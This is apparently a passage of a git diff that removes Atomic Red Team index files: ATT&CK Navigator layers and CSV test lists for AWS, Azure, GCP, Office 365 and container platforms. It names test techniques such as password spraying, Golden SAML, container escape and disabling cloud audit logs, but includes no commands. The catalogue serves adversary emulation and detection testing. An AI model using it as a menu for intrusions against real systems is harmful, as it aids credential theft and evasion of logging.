Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (ESXi)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and 
Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]},{"techniqueID":"T1685","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685/T1685.md"}],"comment":"\n- AWS - GuardDuty Suspension or Deletion\n"},{"techniqueID":"T1685.002","score":7,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n- AWS - Config Logs Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685.002/T1685.002.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1685","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685/T1685.md"}]},{"techniqueID":"T1685.002","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685.002/T1685.002.md"}]}]}
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1685","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685/T1685.md"}]},{"techniqueID":"T1685.002","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event 
Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685.002/T1685.002.md"}]}]}
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]},{"techniqueID":"T1685","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685/T1685.md"}],"comment":"\n- office-365-Disable-AntiPhishRule\n"},{"techniqueID":"T1685.002","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1685.002/T1685.002.md"}]}]}
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -1,23 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
defense-impairment,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
privilege-escalation,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
privilege-escalation,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
privilege-escalation,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
3 credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
4 credential-access T1110.003 Brute Force: Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
5 credential-access T1110.003 Brute Force: Password Spraying 7 Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) f3a10056-0160-4785-8744-d9bd7c12dc39 powershell
6 defense-impairment T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
7 privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
8 privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
9 privilege-escalation T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
10 privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
11 privilege-escalation T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
12 privilege-escalation T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
13 privilege-escalation T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
14 privilege-escalation T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
15 persistence T1098.003 Account Manipulation: Additional Cloud Roles 1 Azure AD - Add Company Administrator Role to a user 4d77f913-56f5-4a14-b4b1-bf7bb24298ad powershell
16 persistence T1098.003 Account Manipulation: Additional Cloud Roles 2 Simulate - Post BEC persistence via user password reset followed by user added to company administrator role 14f3af20-61f1-45b8-ad31-4637815f3f44 powershell
17 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
18 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
19 persistence T1136.003 Create Account: Cloud Account 2 Azure AD - Create a new user e62d23ef-3153-4837-8625-fa4a3829134d powershell
20 persistence T1136.003 Create Account: Cloud Account 3 Azure AD - Create a new user via Azure CLI 228c7498-be31-48e9-83b7-9cb906504ec8 powershell
21 persistence T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
22 persistence T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
23 persistence T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
@@ -1,20 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
discovery,T1613,Container and Resource Discovery,1,Docker Container and Resource Discovery,ea2255df-d781-493b-9693-ac328f9afc3f,sh
discovery,T1613,Container and Resource Discovery,2,Podman Container and Resource Discovery,fc631702-3f03-4f2b-8d8a-6b3d055580a1,sh
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
privilege-escalation,T1611,Escape to Host,3,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,sh
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
stealth,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 discovery T1613 Container and Resource Discovery 1 Docker Container and Resource Discovery ea2255df-d781-493b-9693-ac328f9afc3f sh
3 discovery T1613 Container and Resource Discovery 2 Podman Container and Resource Discovery fc631702-3f03-4f2b-8d8a-6b3d055580a1 sh
4 discovery T1046 Network Service Discovery 9 Network Service Discovery for Containers 06eaafdb-8982-426e-8a31-d572da633caa sh
5 credential-access T1552.007 Kubernetes List Secrets 1 List All Secrets 31e794c4-48fd-4a76-aca4-6587c155bc11 bash
6 credential-access T1552.007 Kubernetes List Secrets 2 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
7 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
8 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
9 persistence T1136.001 Create Account: Local Account 10 Create a Linux user via kubectl in a Pod d9efa6c7-6518-42b2-809a-4f2a8e242b9b bash
10 privilege-escalation T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
11 privilege-escalation T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
12 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
13 privilege-escalation T1611 Escape to Host 2 Mount host filesystem to escape privileged Docker container 6c499943-b098-4bc6-8d38-0956fc182984 sh
14 privilege-escalation T1611 Escape to Host 3 Privilege Escalation via Docker Volume Mapping 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4 sh
15 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
16 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
17 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
18 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
19 execution T1609 Kubernetes Exec Into Container 2 Docker Exec Into Container 900e2c49-221b-42ec-ae3c-4717e41e6219 bash
20 stealth T1612 Build Image on Host 1 Build Image On Host 2db30061-589d-409b-b125-7b473944f9b3 sh
@@ -1 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
@@ -1,5 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
stealth,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
3 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
4 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
5 stealth T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh

Some files were not shown because too many files have changed in this diff Show More